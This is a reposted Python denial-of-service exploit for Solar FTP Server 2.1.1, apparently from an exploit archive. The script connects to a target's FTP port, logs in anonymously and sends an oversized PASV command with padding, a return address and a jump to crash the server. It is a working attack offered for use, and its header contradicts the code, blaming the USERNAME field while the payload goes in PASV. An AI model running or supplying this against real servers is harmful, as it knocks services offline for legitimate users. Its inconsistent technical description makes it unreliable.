Share
## https://sploitus.com/exploit?id=PACKETSTORM:176925
#!/usr/bin/python  
  
# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 31 january 2024  
# Vendor Homepage: N/A  
# Download to demo:   
# Notification vendor: No reported  
# Tested Version: Solar FTP Server 2.1.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo:   
  
#1. Description  
  
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.  
import socket,sys,time,struct  
  
if len(sys.argv) < 2:  
print("[-]Usage: %s <ip addr> " % sys.argv[0])  
  
sys.exit(0)  
  
ip = sys.argv[1]  
  
if len(sys.argv) > 2:  
platform = sys.argv[2]  
  
  
  
ret = struct.pack('<L', 0x7C9572D8)  
  
#works when the server is on 192.168.133.128  
padding = b"\x43" * 468  
junk = b"\x43" * 1532  
frontpad = b"\x41" * 100 + b"\xeb\x30" + b"\x41" * 21  
payload = frontpad + ret + padding + junk  
  
print ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS \n[+] Author: Fernando Mengali\n")  
print ("[+] Connecting to "+ip)  
  
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
try:  
s.connect((ip,21))  
except:  
print("[-] Connection to "+ip+" failed!")  
sys.exit(0)  
  
print ("[+] Exploiting")  
print("[*] Sending payload to command PASV...")  
  
s.send(b"USER anon\r\n")  
s.recv(1024)  
s.send(b"PASS anon\r\n")  
s.recv(1024)  
s.send(b"PASV " + payload + b"\r\n")  
print("[+] Done - Exploited")